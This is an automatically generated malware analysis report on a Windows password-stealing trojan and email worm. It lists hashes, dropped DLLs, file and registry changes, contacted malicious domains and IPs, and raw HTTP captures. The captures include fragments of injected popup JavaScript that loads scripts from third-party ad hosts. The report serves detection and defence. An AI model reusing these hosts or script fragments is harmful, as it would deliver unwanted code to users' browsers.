Gen.Variant.Strictor.70570_bce5185cd6

Susp_Dropper (Kaspersky), Gen:Variant.Strictor.70570 (B) (Emsisoft), Gen:Variant.Strictor.70570 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStu...
Blog rating:3 out of5 with1 ratings

Gen.Variant.Strictor.70570_bce5185cd6

by malwarelabrobot on March 23rd, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Strictor.70570 (B) (Emsisoft), Gen:Variant.Strictor.70570 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: bce5185cd6bcfb15ea413b2870904564
SHA1: fe60dcb09257e2fbc85cc08508bef11e1536bab5
SHA256: 9739e06e111c6f213e67517a0d3cf14c40695b57073d5c01814c1bcce6670c74
SSDeep: 24576:23MMjuiZd4rfbCbg2acawU9txGoF6BhBsYSUNMuITpwTZaqdiXSp0c02uFG6dAk8:2Ng7txKBPeUzBTZaqdwk0c05HGi JJ7
Size: 2351104 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-09-02 15:15:09
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-PSW. Trojan program intended for stealing users passwords.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3404

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G8CYUMX5.txt (230 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXGBCMD7.txt (99 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3748 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZW2X1AZ.txt (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxs11[1].htm (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ssxszgg1[1].htm (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
C:\dc.dll (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssxs13[1].htm (508 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssxs12[1].htm (1283 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017032220170323\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\ssxsz[1].htm (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2KZT5IAY.txt (76 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\mcgg456[1].htm (1461 bytes)
C:\SkinH_EL.dll (178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\mcgg[1].htm (75 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GZOJPSMC.txt (233 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ssggd[1].htm (106 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\2KZT5IAY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101320161014\index.dat (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016101320161014 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8ZW2X1AZ.txt (0 bytes)

Registry activity

The process %original file name%.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFormatTags" = "2"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"aFormatTagCache" = "01 00 00 00 10 00 00 00 55 00 00 00 1E 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CachePrefix" = ":2017032220170323:"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CachePath" = "%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017032220170323"

[HKLM\SOFTWARE\Microsoft\AudioCompressionManager\DriverCache\msacm.l3acm]
"cFilterTags" = "0"
"fdwSupport" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\bce5185cd6bcfb15ea413b2870904564_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017032220170323]
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012016101320161014]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\SkinH_EL.dll
f803ad370a8649a143429f179af5f3ab c:\dc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ??????????????
Product Name: ??????????????
Product Version: 4.4.0.0
Legal Copyright: ??????????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.4.0.0
File Description: ??????????????
Comments: ??????????????
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 970229 970752 4.52493 882e1d6a4d0017a9879d47b74c0635e7
.rdata 974848 1249212 1249280 5.16012 5fcf6c33b35812e3412d866b620faa03
.data 2224128 365898 90112 3.54456 e90c0ce56c63695ac986b82f08626ee2
.rsrc 2592768 32960 36864 3.55108 37ff9cd91594fbeb59b4863ab563a374

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ad.51pc114.cn/setup/a.html 122.228.204.12
hxxp://ad.51pc114.cn/setup/ssxczgg2269.txt 122.228.204.12
hxxp://ad.51pc114.cn/ad/ssggd.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/ssxs11.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/mcgg.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/ssxs12.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/ssxs13.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/gjgg.htm 122.228.204.12
hxxp://ad.51pc114.cn/ad/ssxszgg1.htm 122.228.204.12
hxxp://ad.51pc114.cn/setup/ssxsz.htm 122.228.204.12
hxxp://js.users.51.la/19059730.js 42.236.74.247
hxxp://js.tongji.linezing.com.danuoyi.tbcache.com/1522895/tongji.js 47.89.65.199
hxxp://ad.51pc114.cn/ad/mcgg456.htm 122.228.204.12
hxxp://popup.jointreport-switch.com/close.php?uid=1130 115.238.244.82
hxxp://js.tongji.linezing.com.danuoyi.tbcache.com/1435675/tongji.js 47.89.65.199
hxxp://grp1.51.la/go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/ssxs11.htm&vvtime=1490144878746
hxxp://js.users.51.la/4473463.js 42.236.74.247
hxxp://web.users.51.la/go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/ssxs11.htm&vvtime=1490144878746 42.236.74.234
hxxp://123.51pc114.cn/ad/ssxszgg1.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/ssxs11.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/ssggd.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/gjgg.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/mcgg.htm 122.228.204.12
hxxp://123.51pc114.cn/setup/ssxsz.htm 122.228.204.12
hxxp://js.tongji.linezing.com/1435675/tongji.js 47.89.65.199
hxxp://123.51pc114.cn/ad/ssxs12.htm 122.228.204.12
hxxp://ad.7532.com/ad/mcgg456.htm 122.228.204.12
hxxp://123.51pc114.cn/ad/ssxs13.htm 122.228.204.12
hxxp://js.tongji.linezing.com/1522895/tongji.js 47.89.65.199
u291014.778669.com 122.225.96.73


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /ad/ssxs13.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 508
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxs13.htm
Last-Modified: Thu, 26 Nov 2015 07:34:50 GMT
Accept-Ranges: bytes
ETag: "e0a720ef1c28d11:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>....<............................</body>..</htm
l>..HTTP/1.1 200 OK..Content-Length: 508..Content-Type: text/html..
Content-Location: hXXp://123.51pc114.cn/ad/ssxs13.htm..Last-Modified: 
Thu, 26 Nov 2015 07:34:50 GMT..Accept-Ranges: bytes..ETag: "e0a720ef1c
28d11:948"..Server: IIS..Date: Wed, 22 Mar 2017 01:07:42 GMT..<!DOC
TYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="htt
p://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Con
tent-Type" content="text/html; charset=gb2312" />..<title>QQ.
.............</title>..<style type="text/css">..<!--...
STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {color: #F
FFFFF}..-->..</style>..</head>..<html>..<body&
gt;....<............................</body>..</html>...
.
<<< skipped >>>


GET /close.php?uid=1130 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxs12.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: popup.jointreport-switch.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: tengine
Date: Wed, 22 Mar 2017 01:07:57 GMT
Content-Type: text/html; charset=gb2312
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.28
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache, must-revalidate
Set-Cookie: lgPTN20963270664410=0; expires=Wed, 22-Mar-2017 16:00:00 GMT; path=/; domain=.jointreport-switch.com
222f..(function() {..    var popUrl = 'hXXp://popup.jointreport-switch
.com/jointreport_process.php?ap=MjE2Mnw1ODhlMWM3OTA4ZWQ1YzliM2FmZmY0MG
Q4Zjg2YzAwZWZkNw==';..    var lgUnionPushUrl = CrazyInitUrl(popUrl);..
    function CrazyInitUrl(urls){..        var sf=0,sc=0,ol='',sd=0;.. 
       var ae = function(p) {..            v = false;..            doc
ument.write('<SCRIPT LANGUAGE=VBScript>\n on error resume next \
n v = IsObject(CreateObject("' p '"))<\/SCRIPT>\n');..          
  if(v){..                return '1';..            }else{..           
     return '0';..            }..        };..        var af = function
(p) {..            var m = '';..            for (var i=0; i < navig
ator.mimeTypes.length; i  ){..                m  = navigator.mimeTypes
[i].type.toLowerCase();..            }..            v = '0';..        
    if (m.indexOf(p) != -1){..                if (navigator.mimeTypes[
p].enabledPlugin != null) v = '1';..            }..            return 
v;..        };..        var __dm  = (navigator.appName.indexOf("Netsca
pe") != -1);..        var __di  = (navigator.userAgent.toLowerCase().i
ndexOf("msie") != -1);..        var __dw = ((navigator.userAgent.toLow
erCase().indexOf("win")!=-1) || (navigator.userAgent.toLowerCase().ind
exOf("32bit")!=-1));..        if(__dw && __di) sf = ae("ShockwaveFlash
.ShockwaveFlash.1");..        if(!__dw || __dm) fs = af("application/x
-shockwave-flash");..        if(navigator.appName=="Netscape"){..     
       ol = navigator.language.substr(0,2);..        }else{..     
<<< skipped >>>


GET /setup/ssxczgg2269.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: ad.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Content-Length: 4435
Content-Type: text/html
Server: IIS
Date: Wed, 22 Mar 2017 01:07:39 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>................</title>..<style type="text/css">..&l
t;!--..BODY {.PADDING-RIGHT: 0px; PADDING-LEFT: 35px; BACKGROUND: url(
/images/photoback.gif) repeat-x left top; PADDING-BOTTOM: 0px; MARGIN:
 0px; FONT: 12px Arial, Helvetica, sans-serif; COLOR: #333; PADDING-TO
P: 35px}..A {.COLOR: #007ab7; TEXT-DECORATION: none}..A:hover {COLOR: 
#007ab7; TEXT-DECORATION: none}..A:hover {COLOR: #de1d6a}...hidehr {DI
SPLAY: none}...show12 {PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEF
T: 0px; PADDING-BOTTOM: 0px; MARGIN: 5px 0px; PADDING-TOP: 0px}...show
13 {PADDING-RIGHT: 0px; DISPLAY: block; PADDING-LEFT: 0px; PADDING-BOT
TOM: 0px; MARGIN: 5px 0px; PADDING-TOP: 0px}...show12 A {.BORDER-RIGHT
: #bfdeed 1px solid; PADDING-RIGHT: 6px; BORDER-TOP: #bfdeed 1px solid
; DISPLAY: inline-block; PADDING-LEFT: 6px; BACKGROUND: #d8ebf4; PADDI
NG-BOTTOM: 2px; OVERFLOW: hidden; BORDER-LEFT: #bfdeed 1px solid; LINE
-HEIGHT: 17px; PADDING-TOP: 2px; BORDER-BOTTOM: #bfdeed 1px solid; HEI
GHT: 16px}...show13 A {.BORDER-RIGHT: #bfdeed 1px solid; PADDING-RIGHT
: 6px; BORDER-TOP: #bfdeed 1px solid; DISPLAY: inline-block; PADDING-L
EFT: 6px; BACKGROUND: #d8ebf4; PADDING-BOTTOM: 2px; OVERFLOW: hidden; 
BORDER-LEFT: #bfdeed 1px solid; LINE-HEIGHT: 17px; PADDING-TOP: 2p
<<< skipped >>>


GET /setup/a.html HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Host: ad.51pc114.cn


HTTP/1.1 200 OK
Content-Length: 45
Content-Type: text/html
Content-Location: hXXp://ad.51pc114.cn/setup/a.html
Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT
Accept-Ranges: bytes
ETag: "3efdd9d93cadcf1:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:39 GMT
[EhXXp://ad.51pc114.cn/setup/ex.html]..[n101]HTTP/1.1 200 OK..Content-
Length: 45..Content-Type: text/html..Content-Location: hXXp://ad.51pc1
14.cn/setup/a.html..Last-Modified: Fri, 01 Aug 2014 03:58:28 GMT..Acce
pt-Ranges: bytes..ETag: "3efdd9d93cadcf1:948"..Server: IIS..Date: Wed,
 22 Mar 2017 01:07:39 GMT..[EhXXp://ad.51pc114.cn/setup/ex.html]..[n10
1]..



GET /go.asp?svid=9&id=19059730&tpages=1&ttimes=1&tzone=2&tcolor=32&sSize=1276,846&referrer=&vpage=http://123.51pc114.cn/ad/ssxs11.htm&vvtime=1490144878746 HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxs11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: web.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Wed, 22 Mar 2017 01:08:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Expires: Tue, 21 Mar 2017 08:28:00 GMT
Set-Cookie: ASPSESSIONIDAQDQDRCC=ICHPJKMAONIHNDIJIIFFLDJL; path=/
Cache-control: private
HTTP/1.1 200 OK..Date: Wed, 22 Mar 2017 01:08:00 GMT..Server: Microsof
t-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 0..Content-Type: tex
t/html..Expires: Tue, 21 Mar 2017 08:28:00 GMT..Set-Cookie: ASPSESSION
IDAQDQDRCC=ICHPJKMAONIHNDIJIIFFLDJL; path=/..Cache-control: private..



GET /19059730.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxs11.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Encoding: gzip
Last-Modified: Tue, 07 Mar 2017 12:17:14 GMT
Accept-Ranges: bytes
ETag: "c1c17cc13c97d21:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/8.5
Date: Wed, 22 Mar 2017 01:07:58 GMT
Content-Length: 972
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"f.t........<...q........m.zt
...............w.?|po............Rf...w...g.Q..Y......g.w.....C....>
;..p...~>8}.?......N.=.....#......O~......]~|..7N..:..TK(..-....G..
g....[4..........4k.j.}w..%..$...v.V...T.:.6..z..._....U.4k..;..iUV5..
...2.,......j."[..}....m..*.../.^h.u./...]^>.W.....y..i.....~......
Q..V..`...d:....b..j....../X...p.i...@E.vZUo.|... ......j.....g.;..._e
.y....~..........nw>.s.....-..g.uY..=v..[.S..-...2g.n.fw....;w>.
.f..S....q..o.E.o.c.....'..|......s..3..>....G.._..'.G.....v.0..*j.
.|.V....u[......~Tj.3"F.J..b.*ut......e...X .;TR.>.w....WK.}d~.s.K.
.M4....o...........j.....=.$rt. .4D..m.Z....$. _...?.sK....JPX..H.hu~.
KL.v.UK...R7.s.>..eV,.kR.....4k..x...~.1i.|2^7y..n...Y..=..b..._H..
]..[a...p.....V.l>k....eN.l.l..33.....s...;w?.......1..?...u..@PeuU
...'......... .5.m...p.s.....oV..%....3..M.o..v..Z.[.....".,...-..L5}8
...............S..B...HTTP/1.1 200 OK..Content-Type: application/javas
cript..Content-Encoding: gzip..Last-Modified: Tue, 07 Mar 2017 12:17:1
4 GMT..Accept-Ranges: bytes..ETag: "c1c17cc13c97d21:0"..Vary: Accept-E
ncoding..Server: Microsoft-IIS/8.5..Date: Wed, 22 Mar 2017 01:07:58 GM
T..Content-Length: 972...............`.I.%&/m.{.J.J..t...`.$..@.......
..iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"f.t....
....<...q........m.zt...............w.?|po............Rf...w...g.Q.
.Y......g.w.....C....>..p...~>8}.?......N.=.....#......O~...
<<< skipped >>>


GET /ad/ssxs12.htm HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: 123.51pc114.cn
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 1283
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/ad/ssxs12.htm
Last-Modified: Fri, 09 Dec 2016 13:25:51 GMT
Accept-Ranges: bytes
ETag: "aa9133c31f52d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-eq
uiv="Content-Type" content="text/html; charset=gb2312" />..<titl
e>QQ..............</title>..<style type="text/css">..&l
t;!--...STYLE1 {color: #0000FF}...STYLE2 {font-size: 12px}...STYLE6 {c
olor: #FFFFFF}..-->..</style>..</head>..<html>..&
lt;body>......................<script language='javascript'>.
.// ..................html............var random = {...ad_num : 3,...i
nit : function(){....n = (Math.floor(Math.random()*random.ad_num 1));.
...switch(n){.....case 1:......document.writeln('<script src=\"http
:\/\/p.rhgw.net\/code\/popjs.asp?pid=258920\" charset=\"gb2312\">&l
t;\/script>');.....break;.....case 2:......document.writeln('<sc
ript type=\"text\/javascript\" src=\"http:\/\/popup.jointreport-switch
.com\/close.php?uid=1130\"><\/script>');.....break;.....case 
3:......document.writeln('<script language=\"javascript\" src=\"htt
p:\/\/u291014.778669.com\/fclose.php?id=180495\"><\/script>')
;.....break;....}...}..}..random.init();..</script>....<scrip
t language="javascript" src="hXXp://u291014.778669.com/fclose.php?id=1
52695"></script>..........</body>..</html>..t>....
<<< skipped >>>

GET /setup/ssxsz.htm HTTP/1.1


Referer: hXXp://123.51pc114.cn/setup/ssxsz.htm
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 123.51pc114.cn
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 3
Content-Type: text/html
Content-Location: hXXp://123.51pc114.cn/setup/ssxsz.htm
Last-Modified: Thu, 09 Mar 2017 06:09:42 GMT
Accept-Ranges: bytes
ETag: "e46a71be9b98d21:948"
Server: IIS
Date: Wed, 22 Mar 2017 01:07:42 GMT
5.2HTTP/1.1 200 OK..Content-Length: 3..Content-Type: text/html..Conten
t-Location: hXXp://123.51pc114.cn/setup/ssxsz.htm..Last-Modified: Thu,
 09 Mar 2017 06:09:42 GMT..Accept-Ranges: bytes..ETag: "e46a71be9b98d2
1:948"..Server: IIS..Date: Wed, 22 Mar 2017 01:07:42 GMT..5.2..



GET /1522895/tongji.js HTTP/1.1
Accept: */*
Referer: hXXp://123.51pc114.cn/ad/ssxszgg1.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: js.tongji.linezing.com
Connection: Keep-Alive


HTTP/1.1 503 Service Temporarily Unavailable
Server: Tengine
Content-Length: 0
Connection: keep-alive
Via: cache30.l2hk1[0,503-0,M], cache18.l2hk1[10016,0], cache8.it1[10661,503-0,M], cache7.it1[30000,10661,504001]
Age: 0
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Wed, 22 Mar 2017 01:08:37 GMT
X-Swift-CacheTime: 1
Timing-Allow-Origin: *
EagleId: 2f59411814901448766361688e
HTTP/1.1 503 Service Temporarily Unavailable..Server: Tengine..Content
-Length: 0..Connection: keep-alive..Via: cache30.l2hk1[0,503-0,M], cac
he18.l2hk1[10016,0], cache8.it1[10661,503-0,M], cache7.it1[30000,10661
,504001]..Age: 0..X-Cache: MISS TCP_MISS dirn:-2:-2..X-Swift-SaveTime:
